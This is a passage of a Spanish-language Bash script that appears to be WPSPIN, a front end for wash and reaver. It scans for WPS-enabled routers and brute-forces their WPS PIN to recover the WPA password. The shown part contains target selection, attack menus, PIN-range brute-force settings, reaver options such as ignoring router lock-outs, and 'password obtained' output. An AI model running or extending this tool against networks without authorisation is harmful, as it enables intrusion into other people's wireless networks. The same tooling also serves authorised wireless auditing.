  3348.    if [ -n "${DEFAULTWPA}" ]; then
  3349.     DISPLAYBSSID=$( echo -e "$azulfluo$BSSID$colorbase")
  3350.   else
  3351.     DISPLAYBSSID=$( echo -e "$blanco$BSSID$colorbase")
  3352.   fi
  3353.  
  3354.  
  3355.   if [ "$WALSH_O_WASH" == "wash" ]; then
  3356.     echo -e " $NUM   $DISPLAYBSSID   ${RSSI[${i}]}  ${WPS[${i}]}   $DISPLAY_LOCKED$DISPLAY_PIN  $DISPLY_CHANNEL  $blanco$ESSID$colorbase"
  3357.   else
  3358.    echo -e " $NUM    $DISPLAYBSSID      $DISPLAY_PIN        $blanco$ESSID$colorbase  "
  3359.   fi
  3360.  
  3361. done
  3362.  
  3363. echo -e "$colorbase"
  3364. echo "--------------------------------------------------------------------------------"
  3365. echo ""
  3366.  
  3367.  
  3368. CONFORMITY=$(echo ${#BSSID[@]})
  3369.  
  3370. if [ "$CONFORMITY" = 0 ]; then
  3371.  
  3372.   echo -e  "$rojo ERROR -$blanco Ningunos objetivos encontrados vamos a ver si wash tiene acceso a $amarillo$MON_ATTACK$colorbase "
  3373.  
  3374.     if [[ ! `(timeout 4 wash -i $MON_ATTACK -C | grep ERROR )` ]];
  3375.       then
  3376. echo "--------------------------------------------------------------------------------"
  3377.     echo -e "$verdefluo                            wash tiene acceso a $amarillo$MON_ATTACK$colorbase"
  3378. echo "--------------------------------------------------------------------------------"
  3379.  
  3380. echo -e "$blanco
  3381. - A lo mejor los puntos de acceso cercanos$rojo no tienen WPS$blanco...
  3382. - A lo mejor no ha elegido $verdefluo la mejor interfaz$blanco...
  3383. - Desconecta $amarillo todos os dispositivos$blanco
  3384. - Compruebe $amarillo los permisos$blanco
  3385. - Comprueba$amarillo el punto de montaje$blanco si tiene WPSPIN en un$amarillo USB$blanco o$amarillo disco externo$blanco
  3386. (Especialmente en modo live)
  3387. -$kindofviolet Pronto se implementara Iw scan mode como alternativa a wash$blanco.
  3388. -$rojo De vuelta al menú de selección de interfaz,
  3389. $blanco(si dispone de varios chipset compatibles se le pedirá elegir entre ellos)$blanco
  3390. ... Si sigue saliendo este mensaje;
  3391.   ... compruebe su instalación de wash/reaver
  3392. $verdefluo  Podéis obtener soporte en$amarillo lampiweb.com$verdefluo and$amarillo crack-wifi.com$verdefluo
  3393. and soon in$amarillo Kali linux forum$colorbase"
  3394.   sleep 5
  3395.   airmon-ng stop $MON_ATTACK &>/dev/null
  3396.   unset MON_ATTACK
  3397.   IFACE
  3398.   BIG_MENUE                      
  3399.   else
  3400. echo "--------------------------------------------------------------------------------"
  3401.     echo -e "$rojo                    wash no tiene acceso a la interfaz$amarillo $MON_ATTACK$colorbase"
  3402. echo "--------------------------------------------------------------------------------"
  3403. echo -e "$blanco
  3404. - Compruebe su$amarillo instalación de wash y reaver$blanco
  3405. - Comprueba el$amarillo botón de encendido y apagado del wireless$blanco
  3406. - Compruebe sus$amarillo puertos USB$blanco
  3407.  
  3408. $blanco Redirigiendo-le hacía la$kindofviolet selección de interfaz$blanco
  3409.          ...mientras intentamos$verdefluo arreglar el fallo$colorbase
  3410. $blanco (si dispone de varias interfaces se le pedirá elegir entre ellas)$colorbase"
  3411.   sleep 5
  3412.    
  3413.   if [[ -n `(airmon-ng stop $MON_ATTACK | grep SIOCSIFFLAGS )` ]]; &>/dev/null
  3414.     then
  3415. echo "--------------------------------------------------------------------------------"
  3416. echo -e " $rojo                      RF-Kill esta bloqueando el dispositivo
  3417.  
  3418. $verdefluo     Verifique que su wireless sea activado y verifique su botón wireless $colorbase"
  3419. echo "--------------------------------------------------------------------------------"  
  3420.   sleep 5
  3421.   unset MON_ATTACK
  3422.   IFACE
  3423.   BIG_MENUE
  3424.  fi
  3425. fi
  3426.  
  3427.  
  3428.    
  3429.  
  3430.      
  3431.   else  
  3432.  
  3433. TARGETNUMBER=$( echo -e "$colorbase Introducir el número del objetivo: $amarillo" )  
  3434. read  -ep "$TARGETNUMBER " i
  3435. echo -e "$colorbase"
  3436.  
  3437.  
  3438.   until [[ $i = *[[:digit:]]* ]] && [[ "$i" -lt "$CONFORMITY" ]]  &&  [[ "$i" -ge 1 ]]   ; do
  3439.     echo -e "     $magenta ¡OPCIÓN INVALIDA!  $colorbase"
  3440.     echo ""
  3441.     read  -ep "$TARGETNUMBER " i
  3442.     echo -e "$colorbase"
  3443.   done
  3444. fi
  3445.  
  3446. BSSID=$(echo ${BSSID[${i}]})
  3447. ESSIDSUCIO=$(echo ${ESSID[${i}]})
  3448. ESSID="${ESSIDSUCIO%"${ESSIDSUCIO##*[![:space:]]}"}"
  3449. CHANNEL=$(echo ${CHANNEL[${i}]})
  3450. unset PIN2 && unset PIN3 && unset PIN4 && unset PIN5 && unset PIN6 && unset PIN7 && unset PIN8
  3451.  
  3452. GENERATE
  3453.  
  3454. }
  3455.  
  3456.  
  3457.  
  3458. BIG_MENUE_DISPLAY(){
  3459.  
  3460. echo -e "$colorbase copyleft GPL v.3, support the free software!"
  3461. echo -e "
  3462.        .$amarillo'(     /$rojo·-.  $amarillo  )(.$rojo--.  $amarillo   /$rojo·-.  .$amarillo'(   )\  )\  $rojo
  3463.    ,') \  )  ,' _  \  (   ._.'  ,' _  \ \  ) (  \, / $colorbase     coded by$blanco kcdtv $rojo  
  3464.   (  /(/ /  (  '-' (   ·-. .   (  '-' ( ) (   ) \ (   $colorbase featuring  $blanco antares_145$rojo
  3465.    )    (    ) ,._.'  ,_ (  \   ) ,._.' \  ) ( ( \ \    $blanco r00tnull$colorbase -$blanco 1camaron1$rojo
  3466.   (  .'\ \  (  '     (  '.)  ) (  '      ) \  ·.)/  )    $blanco Coeman76$colorbase -$blanco Spawn$rojo  
  3467. $amarillo   )/   )/   )/   $rojo    '._,_.' $amarillo  )/        )/  $rojo   '$amarillo.( $colorbase  and the$blanco lampiweb team $colorbase"
  3468. echo ""
  3469. echo ""
  3470. echo -e "    $amarillo www.crack-wifi.com     www.lampiweb.com    www.auditoriaswireless.net$colorbase"
  3471.  
  3472. echo ""
  3473. echo ""
  3474. echo -e "                                                        "
  3475. echo -e " $magenta      _   ''   $rojo  _ () _      $amarillo                _ _ _                      
  3476. $magenta     [|)efault$rojo  ||)[][|\|$magenta  generator  with$amarillo   \\/\/||)S $magenta attack  interface
  3477.   $rojo              L|          $amarillo                     L|  $magenta  ''                   "
  3478. echo ""
  3479.  
  3480. echo -e "$rojo
  3481.                          _ _    _       _        ||
  3482.                         //\/\ E[|\|ue  ||)rincipaL_]  ''
  3483.                                        L|    $colorbase"
  3484. echo "
  3485. "
  3486.  
  3487.  
  3488. echo -e "                +----------------------------------------------+  "
  3489. echo -e "                |                                              |  "
  3490. echo -e "                |  $amarillo   1$colorbase  -$blanco  MODO GUIADO (WASH Y REAVER)$colorbase        |  "
  3491. echo -e "                |  $amarillo   2$colorbase  -$blanco  PIN GENERADOR (CON MENU DE ATAQUE)$colorbase |  "
  3492. echo -e "                |  $amarillo   3$colorbase  -$blanco  CAMBIAR INTERFAZ$colorbase                   |  "
  3493. echo -e "                |  $amarillo   4$colorbase  -$blanco  REINICIAR O CAMBIAR IDIOMA$colorbase         |  "
  3494. echo -e "                |  $amarillo   5$colorbase  -$blanco  SALIR$colorbase                              |  "
  3495. echo -e "                |                                              |  "
  3496. echo -e "                +----------------------------------------------+  "
  3497. echo ""
  3498. echo ""
  3499. echo -e "                               Su elección : $rojo"
  3500. echo ""
  3501. read -ep "                                      " BIG_MENUE_CHOICE
  3502. echo -e "$colorbase"
  3503.  
  3504. until [[ $BIG_MENUE_CHOICE = *[[:digit:]]* ]]  &&  [[ "$BIG_MENUE_CHOICE" -gt "0" ]]  && [[ "$BIG_MENUE_CHOICE" -lt "6" ]] ; do
  3505.  BIG_MENUE_DISPLAY
  3506. done
  3507.  
  3508. }
  3509.  
  3510.  
  3511.  
  3512.  
  3513. CIAO(){
  3514.  
  3515. echo -e "$colorbase"
  3516. echo -e "                       Saludos, nos vemos en$amarillo lampiweb.com$colorbase "
  3517. echo -e "           $rojo                  #      $amarillo crack-wifi.com$colorbase  y$amarillo auditoriaswireless.net$colorbase"
  3518. echo -e "                     $rojo       / \  $colorbase    "
  3519. echo -e "                        - $blanco (O o) $colorbase -         "          
  3520. echo -e "----------------------$blanco ooO--(_)-$blanco Ooo$colorbase--------------------------------------------"
  3521. exit 0
  3522.  
  3523. }
  3524.  
  3525.  
  3526.  
  3527.  
  3528.  
  3529.  
  3530.  
  3531.  
  3532. ATTACK_MENUE_DISPLAY(){
  3533. echo -e "                  "
  3534. echo -e "              Objetivo > $blanco$ESSID $colorbase mac > $blanco$BSSID $colorbase"
  3535. echo -e "              +----------------------------------------------------+  "
  3536. echo -e "              |$blanco   1 $colorbase -$amarillo ATACAR OBJETIVO CON EL PIN $rojo$PIN$colorbase         |  "
  3537. echo -e "              |$blanco   2 $colorbase -$amarillo ENTRAR OTRO PIN                    $colorbase         |  "
  3538. echo -e "              |$blanco   3 $colorbase -$amarillo ELEGIR UN RANGO DE PIN$colorbase                      |  "
  3539. echo -e "              |$blanco   4 $colorbase -$amarillo PERSONALIZAR EL ATTAQUE CON REAVER $colorbase         |  "
  3540. echo -e "              |$blanco   5 $colorbase -$verdefluo ELEGIR OTRO OBJETIVO $colorbase                       |  "
  3541. echo -e "              |$blanco   6 $colorbase <$azulfluo VOLVER$blanco /$amarillo CAMBIAR INTERFAZ$colorbase +$amarillo NUEVO ESCANEO$colorbase   |  "
  3542. echo -e "              |$blanco   7 $colorbase -$azulfluo REINICIAR$blanco /$azulfluo CAMBIAR IDIOMA$colorbase                  |  "
  3543. echo -e "              |$blanco   8 $colorbase -$rojo SALIR $colorbase                                      |  "
  3544. echo -e "              +----------------------------------------------------+  "
  3545. echo ""
  3546. echo ""
  3547. echo -e "                               Su elección : $rojo"
  3548. echo ""
  3549. read -ep "                                      " ATTACK_MENUE_CHOICE
  3550. echo -e " $colorbase"
  3551. until [[ $ATTACK_MENUE_CHOICE = *[[:digit:]]* ]] && [[ "$ATTACK_MENUE_CHOICE" -lt "9" ]]  &&  [[ "$ATTACK_MENUE_CHOICE" -gt "0" ]]; do  2> /dev/null
  3552.  ATTACK_MENUE_DISPLAY
  3553. done
  3554.  
  3555. }
  3556.  
  3557.  
  3558. CUSTOMPIN()                     # This function is used to allow the user to manually enter a PIN to be tried first
  3559. {                               # option 2 in the attack menue
  3560.  
  3561. unset SELECTEDPIN 2> /dev/null  # we delete the former selected PIN if it remained set
  3562.  
  3563. echo ""
  3564. echo -e "         Entra los$amarillo 7 primeros dígitos$colorbase del$amarillo PIN$colorbase que quiere probar primero
  3565.                       (No se necesita el checksum)
  3566. $verdefluo "
  3567. read -ep "                                " SELECTEDPIN
  3568. echo -e "$colorbase"
  3569. while !(echo $SELECTEDPIN | egrep -q "^([0-9]{7})$")
  3570.  do
  3571.    echo -e "           $rojo              ERROR: TIENE QUE ENTRAR 7 NUMEROS $colorbase"
  3572.    CUSTOMPIN
  3573. done
  3574. }
  3575.  
  3576.  
  3577. SECATOR()                   # This function let the user choose for a sequence of PIN to try first, we determine 4 values, 2 4 digits strings
  3578. {                           # ( first half PIN ) and 2 3 digits strings ( second half )
  3579.  
  3580. unset INICIOSEQUENCEFIRST 2> /dev/null  #  We ensure that there is not former values stored
  3581. unset FINSEQUENCEFIRST 2> /dev/null     #
  3582.  
  3583.  if [[ "$HEAD3" = "0" ]]; then         # if the first half PIN hasn't been found yet we propose to customize sequence on the first PIN
  3584.     echo "+------------------------------------------------------------------------------+"
  3585.     echo -e "|        $azullight            1* SECUENCIA PARA LA$verdefluo PRIMERA MITAD DE PIN $colorbase                |"
  3586.     echo "+------------------------------------------------------------------------------+"
  3587.     ASKSSTARTSEQUENCE=$( echo -e "$colorbase Entra los cuatros números$blanco al inicio de la secuencia $verdefluo ")
  3588.    
  3589.     read -ep "$ASKSSTARTSEQUENCE" INICIOSEQUENCEFIRST
  3590. while !(echo $INICIOSEQUENCEFIRST | egrep -q "^([0-9]{4})$")
  3591.            do
  3592.             echo ""
  3593.             echo -e "                       $rojo    ERROR: DEBE ENTRAR 4 NUMEROS $colorbase "
  3594.             echo ""
  3595.              read -ep "$ASKSSTARTSEQUENCE" INICIOSEQUENCEFIRST
  3596. done
  3597.    
  3598.     ASKENDSEQUENCE=$( echo -e "$colorbase Entra los cuatro números$blanco al final de la secuencia$rojo ")
  3599.    
  3600.     read -ep "$ASKENDSEQUENCE" FINSEQUENCEFIRST                                                                      
  3601.    
  3602.    
  3603.           while !(echo $FINSEQUENCEFIRST | egrep -q "^([0-9]{4})$")
  3604.            do
  3605.             echo ""
  3606.             echo -e "                       $rojo    ERROR: DEBE ENTRAR 4 NUMEROS $colorbase "
  3607.             echo ""  
  3608.                 read -e -p "$ASKENDSEQUENCE" FINSEQUENCEFIRST                                                              
  3609.          done
  3610.  
  3611.   fi
  3612.  
  3613. unset INICIOSEQUENCESECOND 2> /dev/null  #  We ensure that there is not former values stored
  3614. unset FINSEQUENCESECOND 2> /dev/null
  3615.  
  3616.     echo -e "$colorbase+------------------------------------------------------------------------------+"
  3617.     echo -e "|       $azullight             2* SECUENCIA PARA LA$rojo SEGUNDA MITAD DE PIN$colorbase                 |"
  3618.     echo -e "+------------------------------------------------------------------------------+"
  3619.     echo -e "|        $amarillo no poner el checksum ( ultimo dígito )$blanco - $rojo X para salir$colorbase               |"
  3620.     ASKSSTARTSEQUENCE2=$( echo -e "$colorbase Entra los tres números$blanco al inicio de la secuencia$verdefluo ")
  3621.     read -ep "$ASKSSTARTSEQUENCE2" INICIOSEQUENCESECOND    
  3622.  
  3623.    
  3624.  
  3625.       while !(echo $INICIOSEQUENCESECOND | egrep -q "^([0-9]{3})$")
  3626.         do
  3627.             if [[ "$INICIOSEQUENCESECOND" == "X" || "$INICIOSEQUENCESECOND" == "x" ]] ; then
  3628.    
  3629.               break
  3630.             fi
  3631.           echo ""
  3632.           echo -e "                   $rojo ERROR: DEBE ENTRAR 3 NUMEROS ( X PARA SALIR ) $colorbase "
  3633.           echo ""
  3634.           read -ep "$ASKSSTARTSEQUENCE2" INICIOSEQUENCESECOND
  3635.       done
  3636.  
  3637.  
  3638.     ASKENDSEQUENCE2=$( echo -e "$colorbase Entra los 3 números$blanco al final de la seceuncia$rojo ")
  3639.  
  3640.     read -ep "$ASKENDSEQUENCE2" FINSEQUENCESECOND
  3641.  
  3642.     while !(echo $FINSEQUENCESECOND | egrep -q "^([0-9]{3})$")  
  3643.       do
  3644.          if [[ "$FINSEQUENCESECOND" == "X" || "$FINSEQUENCESECOND" == "x" ]]; then
  3645.            break
  3646.          fi
  3647.           echo ""
  3648.           echo -e "                   $rojo ERROR: DEBE ENTRAR 3 NUMEROS ( X PARA SALIR ) $colorbase "
  3649.           echo ""
  3650.           read -ep "$ASKENDSEQUENCE2" FINSEQUENCESECOND
  3651.  
  3652.     done
  3653. echo -e "$colorbase+------------------------------------------------------------------------------+"
  3654. }
  3655.  
  3656.  
  3657.  
  3658.  
  3659. SUMUPNOM6()
  3660. {
  3661. PINECRAN=$( printf '%04d\n' $HEAD1 )
  3662. PINLEFT=`expr 11000 '-' $HEAD1`
  3663. PINLEFTECRAN=$( printf '%05d\n' $PINLEFT )
  3664. PORCENT1=`expr $HEAD1 '*' 100 '/' 11`
  3665.  
  3666. PORCENT2=$( printf '%05d\n' $PORCENT1 )
  3667.  
  3668. INICIOPORCENT=$( echo "$PORCENT2" | cut -b -2 )
  3669.  
  3670. ENDPORCENT=$( echo "$PORCENT2" | cut -b 3- )
  3671.  
  3672. echo " +--------------------------------------+"
  3673. echo -e " |   $amarillo             RESUMEN       $colorbase        | "    ####################"TESTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
  3674. echo " +--------------------------------------+"
  3675. echo -e " |      Atacando la$rojo primera$colorbase mitad       | "
  3676. echo -e " |  Primeras mitades comprobadas - $amarillo$PINECRAN$colorbase |"    
  3677. echo -e " |    Quedan un máximo de $amarillo $PINLEFTECRAN$colorbase PIN    |"
  3678. echo " +--------------------------------------+"
  3679. echo -e " | $rojo$INICIOPORCENT$colorbase,$rojo$ENDPORCENT$colorbase% del ataque ha sido realizado |"
  3680. echo " +--------------------------------------+"  
  3681. echo ""
  3682.  
  3683.  
  3684. }
  3685.  
  3686.  
  3687.  
  3688. SUMUPM6()
  3689. {
  3690.  
  3691. PINECRAN=$( printf '%04d\n' $HEAD1 )
  3692. PINECRAN2=$( printf '%03d\n' $HEAD2 )
  3693. PINLEFT=`expr 1000 '-' $HEAD2`
  3694. PINLEFTECRAN=$( printf '%03d\n' $PINLEFT )
  3695. PORCENT1=`expr '(' $HEAD2 '+' 10000 ')' '*' 100 '/' 11`
  3696. PORCENT2=$( printf '%04d\n' $PORCENT1 )
  3697. INICIOPORCENT=$( echo "$PORCENT2" | cut -b -2 )
  3698. ENDPORCENT=$( echo "$PORCENT2" | cut -b 2- )
  3699. echo -e " $colorbase "  
  3700. echo "+------------------------------------------------------------------------------+"
  3701. echo -e "|   $amarillo                                 RESUMEN                           $colorbase        |"    ####################"TESTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
  3702. echo "+------------------------------------------------------------------------------+"
  3703. echo -e "|   $verdefluo PRIMERA MITAD PIN ENCONTRADA !$colorbase     |     Atacando la$rojo segunda $colorbase mitad       |"
  3704. echo -e "|               $amarillo $PRIMERAMITAD$colorbase                   |  Segundas mitades comprobadas - $amarillo$PINECRAN2$colorbase  |"
  3705. echo -e "|Primeras mitades de PIN probadas - $verdefluo$PINECRAN$colorbase|     Quedan un máximo de$amarillo $PINLEFTECRAN$colorbase PIN      |"    
  3706.  
  3707. echo "+------------------------------------------------------------------------------+"
  3708. echo -e "|                     $rojo$INICIOPORCENT$colorbase,$rojo$ENDPORCENT$colorbase% del ataque ha sido efectuado                    |"
  3709. echo "+------------------------------------------------------------------------------+"  
  3710. echo -e "$colorbase"
  3711.  
  3712. }
  3713.  
  3714.  
  3715.  
  3716.  
  3717. PINFOUND(){
  3718.  
  3719. DATE=$(  date | cut -d "," -f 1 )
  3720. NEWNAME=${DATE// /_}
  3721. DISPLAYNEWNAME1=$( echo "$NEWNAME-$WPCNAME                                                            " | cut -b -70 )
  3722. DISPLAYNAME=$( echo "$DISPLAYNEWNAME1 $colorbase|")
  3723. echo -e " $colorbase "  
  3724. echo "+------------------------------------------------------------------------------+"
  3725. echo -e "|          $verdefluo  SE OBTUVO EL PIN    !            $colorbase pin es $amarillo$PIN    $colorbase             |"
  3726. echo "+------------------------------------------------------------------------------+"
  3727. echo "|   la sesión *.wpc ha sido respalda en su carpeta WPSPIN bajo el nombre de   |"
  3728. echo -e "|       $azulfluo$DISPLAYNAME"
  3729. echo "+------------------------------------------------------------------------------+"
  3730.  
  3731. cat "$DIRECTORY/$WPCNAME" >> "$NEWNAME$WPCNAME"
  3732.  
  3733. rm -r "$DIRECTORY/$WPCNAME"
  3734.  
  3735. }
  3736.  
  3737.  
  3738.  
  3739. FAILEDREAVER()
  3740. {
  3741. echo "+------------------------------------------------------------------------------+"
  3742. echo -e "$rojo                                  ERROR $colorbase
  3743. +------------------------------------------------------------------------------+
  3744. $blanco                   Reaver no ha sido capaz de iniciar la interfaz$amarillo $MON_ATTACK$blanco
  3745.  
  3746.  - Compruebe el$amarillo botón wireless$blanco de su portátil
  3747.  - Compruebe sus $amarillo puertos y conexiones USB$blanco
  3748.  -$amarillo Desconectase$blanco de Internet
  3749.  
  3750. ... Lo enviamos en el menú de$kindofviolet selección de interfaz
  3751. $colorbase"
  3752. sleep 5
  3753.  
  3754. rm attack.txt
  3755.  
  3756.  
  3757.  
  3758. if [[ -n `(airmon-ng stop $MON_ATTACK | grep SIOCSIFFLAGS )` ]]; &>/dev/null
  3759.     then
  3760. echo "--------------------------------------------------------------------------------"
  3761. echo -e " $rojo                      RF-Kill esta bloqueando el dispositivo
  3762.  
  3763. $verdefluo    Verifique que su wireless sea activado y verifique su botón wireless $colorbase"
  3764. echo "--------------------------------------------------------------------------------"  
  3765.  sleep 5  
  3766.  
  3767.  fi
  3768.  
  3769. unset MON_ATTACK
  3770.  
  3771. IFACE
  3772. BIG_MENUE
  3773. }
  3774.  
  3775.  
  3776.  
  3777.  
  3778. FAKEM4WARNING()
  3779. {
  3780. echo -e "$colorbase"
  3781. echo "+------------------------------------------------------------------------------+"
  3782. echo -e "|                   $rojo       M4 SOSPECHOSO DETECTADO  $colorbase                           |"
  3783. echo "+------------------------------------------------------------------------------+"
  3784. echo -e "|$blanco A veces reaver procesa M4 que no han sido correctamente comprobados haciendo$colorbase |"
  3785. echo -e "|$blanco   que la llave no se recupere. Si esto sucede borrar $amarillo$WPCNAME$colorbase   |"
  3786. echo -e "|$blanco  y renombrar $amarillo BACKUPfakeM4_$WPCNAME$blanco como$verdefluo $WPCNAME$colorbase  |"
  3787. echo -e "|$blanco                  Volverá al primer$rojo M4 sospechoso$blanco detectado   $colorbase                |"
  3788. echo "+------------------------------------------------------------------------------+"
  3789. echo -e "$colorbase"
  3790. }
  3791.  
  3792.  
  3793. FAKEM6WARNING()
  3794. {
  3795. echo -e "$colorbase"
  3796. echo "+------------------------------------------------------------------------------+"
  3797. echo -e "|                   $rojo       M6 SOSPECHOSO DETECTADO  $colorbase                           |"
  3798. echo "+------------------------------------------------------------------------------+"
  3799. echo -e "|$blanco A veces reaver procesa M6 que no han sido correctamente comprobados haciendo$colorbase |"
  3800. echo -e "|$blanco   que la llave no se recupere. Si esto sucede borrar $amarillo$WPCNAME$colorbase   |"
  3801. echo -e "|$blanco  y renombrar $amarillo BACKUPfakeM6_$WPCNAME$blanco como$verdefluo $WPCNAME$colorbase  |"
  3802. echo -e "|$blanco                  Volverá al primer$rojo M6 sospechoso$blanco detectado   $colorbase                |"
  3803. echo "+------------------------------------------------------------------------------+"
  3804. echo -e "$colorbase"
  3805. }
  3806.  
  3807.  
  3808. CUSTOMREAVER()
  3809. {
  3810. echo -e "$colorbase+------------------------------------------------------------------------------+
  3811. |                  $violet          OPCIONES DISPONIBLES        $colorbase                      |
  3812. +------------------------------------------------------------------------------+
  3813. |$amarillo -e$colorbase --essid=<ssid>    $blanco          ESSID del objetivo        $colorbase                    |
  3814. |$amarillo -c$colorbase --channel=<channel>    $blanco     fijar el canal de nuestra interfaz        $colorbase    |
  3815. |                                $blanco   (se activa -f automaticamente)  $colorbase           |
  3816. |$amarillo -D$colorbase --daemonize   $blanco              Daemonize reaver         $colorbase                     |
  3817. |$amarillo -a$colorbase --auto       $blanco               Deja reaver buscar automáticamente los ajustes$colorbase|
  3818. |                                     $blanco       para el objetivo$colorbase                  |
  3819. |$amarillo -f$colorbase --fixed       $blanco              Desactiva el salto de canales     $colorbase            |
  3820. |$amarillo -5$colorbase --5ghz          $blanco            Usa la banda 5GHz (A)        $colorbase                 |
  3821. |$amarillo -d$colorbase --delay=<seconds>  $blanco         rato entre intentos de PIN ( por defecto [1]) $colorbase|
  3822. |$amarillo -l$colorbase --lock-delay=<seconds> $blanco     Definir un tiempo de espera antes de volver a $colorbase|
  3823. |         $blanco atacar cuando el routeur bloquea el WPS ( por defecto [60] )  $colorbase      |
  3824. |$amarillo -g$colorbase --max-attempts=<num>    $blanco    Parar después de cierto numero de PIN$colorbase         |
  3825. |$amarillo -x$colorbase --fail-wait=<seconds>   $blanco    Definir una pausa después de 1O intentos    $colorbase  |
  3826. |                                   $blanco fallidos ( valor por defecto [0] ) $colorbase       |
  3827. |$amarillo -r$colorbase --recurring-delay=<x:y>   $blanco  Pausar durante y segundos cada x intentos $colorbase    |
  3828. |$amarillo -t$colorbase --timeout=<seconds>       $blanco  Modificar el time out ([5] por defecto)   $colorbase    |
  3829. |$amarillo -T$colorbase --m57-timeout=<seconds>  $blanco   Definir el timeout entre M5/M7 [0.20] $colorbase        |
  3830. |$amarillo -A$colorbase --no-associate       $blanco       Reaver no se asocia con el AP      $colorbase           |
  3831. |                     $blanco (la asociación se tiene que hacer con otra herramienta)$colorbase |
  3832. |$amarillo -N$colorbase --no-nacks       $blanco           No se manda NACK cuando se reciben paquetes$colorbase   |
  3833. |                  $blanco comunicando que el protocolo quedo fuera de servicio   $colorbase    |
  3834. |$amarillo -S$colorbase --dh-small      $blanco            emplear pequeñas llaves DH para acelerar crack$colorbase|
  3835. |$amarillo -L$colorbase --ignore-locks      $blanco        Ignorar el estado de bloqueo cuando aparece$colorbase   |
  3836. |$amarillo -E$colorbase --eap-terminate     $blanco        Acabar cada transacción de PIN con    $colorbase        |
  3837. |                                   $blanco      un paquete EAP-FAIL         $colorbase         |
  3838. |$amarillo -n$colorbase --nack           $blanco           El objetivo siempre manda un NACK [Automatico]$colorbase|
  3839. |$amarillo -w$colorbase --win7          $blanco            Imitar windows 7 [No activado]   $colorbase             |
  3840. +------------------------------------------------------------------------------+
  3841. Los argumentos en rojo son mandatorios ($rojo reaver -i $MON_ATTACK -b $BSSID$colorbase )
  3842. Completa la linea mas abajo$colorbase. Añadir $amarillo -c $CHANNEL$colorbase para fijar el canal del objetivo
  3843. Y añadir $amarillo-vv $colorbase para obtener la información detallada sobre el ataque
  3844. Buena suerte :) $amarillo
  3845. "
  3846. MANDATORY=$( echo -e "$rojo reaver -i $MON_ATTACK -b $BSSID$verdefluo")
  3847. read -e -p " $MANDATORY " REAVERCOMMAND
  3848. echo -e "$colorbase"
  3849.  
  3850. until [ -z `echo $REAVERCOMMAND | tr vecDaf1234567890dlgxrtTANSLEnw - | tr -d "-" | tr -d ' '` ] ;
  3851. do
  3852.  echo -e "$rojo error,$blanco opción incorrecta, consulte la lista mas arriba"
  3853.  echo "entrar los argumentos deseados o dejar en blanco y darle a enter
  3854. "
  3855.  read -e -p " $MANDATORY " REAVERCOMMAND
  3856.  echo -e "$colorbase"
  3857. done
  3858. echo -e "$blanco ataque personalizado guardado; $colorbase
  3859. Podéis atacar ahora mismo ($blanco 1 $colorbase) con el PIN indicado  
  3860. Podéis tambien entrar otro PIN ($blanco 2$colorbase ) o definir una secuencia entera de PIN ($blanco 3 $colorbase)
  3861.  
  3862. "
  3863.  
  3864. }
  3865.  
  3866.  
  3867.  
  3868. MON_ADVERTENCIA=$( echo -e "                                        
  3869.                 $rojo             ¡ADVERTENCIA!
  3870. $colorbase
  3871. $rojo   El único chipset hallado por el sistema es desconocido por airmon-ng
  3872.               es probable que escaneo y ataque no funcionen :(  
  3873. $colorbase
  3874. " )                                                                # warning the user if his chipset is not fully recognized by airmon-ng
  3875.  
  3876.  
  3877.  
  3878.  
  3879.  
  3880. INTERFACEDESIGN=$( echo -e "$colorbase
  3881.   NUMERO     INTERFAZ       CHIPSET Y CONTROLADOR
  3882.              ---------------------------------------------------  
  3883. $blanco")                                                               # up part of the interface selection menue  
  3884.  
  3885.  
  3886.  
  3887. WASHWAIT=$(echo "+------------------------------------------------------------------------------+"
  3888.         echo -e "|                $verdefluo         EFECTUANDO EL SCAN CON WASH$colorbase                          |
  3889. +------------------------------------------------------------------------------+
  3890. |$blanco El$amarillo PIN$blanco se muestra :            $colorbase                                              |
  3891. |                                                                              |
  3892. |$blanco  - En$verdefluo verde$blanco cuando el dispositivo esta soportado$colorbase                             |
  3893. |$blanco  - En$orange naranja$blanco cuando se trata de un dispositivo desconocido$colorbase                  |
  3894. |$blanco  - En$rojo rojo$blanco y sin valor numérico cuando el dispositivo no tiene soporte $colorbase      |
  3895. |                                                                              |
  3896. |$azulfluo Si el BSSID sale en azul$blanco : se genera y enseña la llave WPA por defecto $colorbase      |
  3897. |             $blanco    cuando se selecciona dicho BSSID    $colorbase                         |
  3898. |                                                                              |
  3899. +------------------------------------------------------------------------------+
  3900. |         $magenta       CERRAR LA VENTANA DE SCAN PARA LA FASE SIGUIENTE$colorbase              |
  3901. +------------------------------------------------------------------------------+")
  3902.  
  3903.  
  3904.  
  3905.  
  3906.  
  3907.  
  3908. NO_MONITOR_MODE=$(echo -e "$rojo              ¡ADVERTENCIA!$colorbase :$amarillo ¡ NO INTERFAZ COMPATIBLE DETECTADA ¡ $colorbase
  3909.  
  3910. $rojo     WPSPIN se ejecutará solo en modo generador (sin escaneo, sin ataque)$colorbase
  3911. $rojo          puede redetectar las interfaces con el opción redetectar$colorbase ")
  3912.  
  3913.  
  3914.  
  3915. NO_REAVER=$(echo -e "$rojo        ADVERTENCIA$colorbase :$amarillo ¡ NO SE DETECTO NINGUNA VERSIÓN DE WPS REAVER !  $colorbase
  3916. $blanco      WPSPIN se ejecutará solo en modo generador (sin escaneo, sin ataque)$colorbase
  3917. $blanco      Instalar wps reaver para disfrutar de todas las funciones de WPSPIN$colorbase")
  3918.  
  3919.  
  3920.  
  3921. FAILED=$(echo -e "
  3922.                       +------------------------------------+
  3923.                       |    $blanco      Ataque fallido    $colorbase        |
  3924.                       +------------------------------------+
  3925.                       |  $rojo¡NO SE OBTUVO LA CONTRASEÑA WPA!$colorbase  |  
  3926.                       +------------------------------------+
  3927. " )
  3928.  
  3929. KEY_FOUND=$(echo -e "
  3930.                      +-------------------------------------+
  3931.                      |$verdefluo    ¡SE OBTUVO LA CONTRASEÑA WPA! $colorbase   |
  3932.                      +-------------------------------------+
  3933.             Resultados guardados en su carpeta WPSPIN en el fichero $colorbase "
  3934.  )
  3935.  
  3936.  
  3937.  
  3938.  
  3939. STOP_REAVER=$(echo -e " $rojo                   < CTRL + C > PARA PARRAR EL ATAQUE $colorbase "
  3940.  )
  3941.  
  3942.  
  3943.  
  3944.  
  3945.  
  3946. AIRMON_WARNING=$(echo -e "
  3947. $rojo                     ¡ADVERTENCIA!$amarillo CHIPSET NO SOPORTADO!
  3948.  
  3949. $rojo           No se garantiza el buen funcionamiento de escaneo y ataque    
